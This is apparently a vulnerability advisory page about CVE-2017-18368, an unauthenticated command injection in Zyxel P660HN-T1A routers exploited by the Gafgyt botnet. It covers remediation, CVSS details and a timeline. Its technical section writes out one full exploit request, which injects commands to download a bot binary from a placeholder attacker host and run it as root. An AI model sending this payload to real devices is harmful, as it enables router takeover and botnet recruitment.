What Is Zyxel P660HN-T1A?
The Zyxel P660HN-T1A is an ADSL2+ DSL modem/router widely deployed as home and small business internet gateway hardware. Like most consumer and small business networking equipment, it includes a web-based management interface for configuration. Consumer routers are prime targets for IoT botnet recruitment because they are internet-connected, rarely patched, run 24/7, and often have weak or default credentials. Compromised routers are typically recruited into DDoS botnets (Mirai, Gafgyt, and variants) or used as proxy infrastructure for threat actor operations.
Overview
CVE-2017-18368 is a critical unauthenticated OS command injection vulnerability in Zyxel P660HN-T1A routers. The Remote System Log forwarding feature passes the remote_host parameter from the ViewLog.asp page directly to a system command without sanitization, allowing an unauthenticated attacker to inject arbitrary OS commands executed as root on the router. This vulnerability was actively exploited in 2023 by a new variant of the Gafgyt (BASHLITE) IoT botnet, triggering its KEV addition. Zyxel issued a security advisory recommending firmware updates where available and device replacement for end-of-life models.
Affected Versions
Zyxel P660HN-T1A v1 and v2 hardware revisions running firmware before the patched release. Given the age and end-of-life status of this hardware, many deployed units may never receive firmware updates.
Technical Details
Root Cause: Unsanitized Parameter in System Log Forwarding
CVE-2017-18368 is an OS command injection vulnerability (CWE-78) in the P660HN-T1A's web management interface. The router supports a "Remote System Log" feature that forwards syslog messages to a specified remote host. The ViewLog.asp page accepts a remote_host parameter for configuring the syslog destination. This parameter is passed without sanitization to an underlying shell command that configures the syslog forwarding — enabling an attacker to inject shell metacharacters (;, &&, |, backticks) to execute arbitrary commands.
The endpoint is accessible without authentication, making the attack completely trivial:
GET /ViewLog.asp?remote_host=127.0.0.1;wget+http://attacker/bot+-O+/tmp/bot;chmod+777+/tmp/bot;/tmp/bot
Commands execute as root (the management interface process user), giving the attacker full device control.
Attack Characteristics
| Attribute | Detail |
|---|---|
| Attack Vector | Network — unauthenticated HTTP GET |
| Endpoint | /ViewLog.asp?remote_host= |
| Authentication | None required |
| Impact | Root command execution on router |
| Common Payload | Download and execute botnet malware |
Discovery
Discovered by security researchers and published as CVE in 2019. The vulnerability was exploited in the wild by 2023 when Gafgyt botnet operators incorporated it into their scanning and exploitation infrastructure.
Exploitation Context
- Gafgyt (BASHLITE) botnet: A new Gafgyt variant in 2023 incorporated CVE-2017-18368 alongside other IoT device exploits to recruit routers into DDoS infrastructure; Zyxel published its security advisory in direct response to observed exploitation
- IoT botnet mechanics: Botnets like Gafgyt scan the internet for vulnerable devices, automatically exploit them, download a bot binary from C2 infrastructure, and configure persistence; the entire compromise takes seconds and requires no human interaction
- End-of-life device prevalence: The P660HN-T1A is an older device that may not receive firmware updates; internet-facing DSL routers with no available patch represent permanent exposure
- DDoS-for-hire infrastructure: Compromised home and small business routers are aggregated into botnets rented for DDoS attacks; the attacker's goal is not the router data but its bandwidth and IP address
- CISA KEV (2023): Added August 7, 2023 reflecting active Gafgyt exploitation
Remediation
-
Apply Zyxel firmware update — check Zyxel's support site for P660HN-T1A firmware updates; apply any available updates that address CVE-2017-18368.
-
Replace end-of-life hardware — if no firmware update is available for your hardware revision, replace the P660HN-T1A with a currently supported router model that receives security updates.
-
Disable remote management access — ensure the router management interface is not accessible from the internet (WAN-side access disabled); restricting management to the LAN side eliminates the remote exploitation vector.
-
Change default credentials — ensure the router admin password is changed from factory defaults; even if this vulnerability is patched, default credentials remain a common attack vector for router compromise.
-
Network monitoring — monitor for unusual outbound traffic patterns (high UDP traffic, connections to known botnet C2 infrastructure) which may indicate compromise; compromised routers typically show distinctive botnet traffic signatures.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2017-18368 |
| Vendor / Product | Zyxel — P660HN-T1A Routers |
| NVD Published | 2019-05-02 |
| NVD Last Modified | 2025-11-05 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') find similar ↗ |
| CISA KEV Added | 2023-08-07 |
| CISA KEV Deadline | 2023-08-28 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2019-05-02 | CVE-2017-18368 published by NVD |
| 2023-08-07 | Zyxel publishes security advisory; CVE-2017-18368 added to CISA Known Exploited Vulnerabilities catalog following Gafgyt botnet exploitation |
| 2023-08-28 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2017-18368 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Zyxel Security Advisory — Command Injection in P660HN-T1A | Vendor Advisory |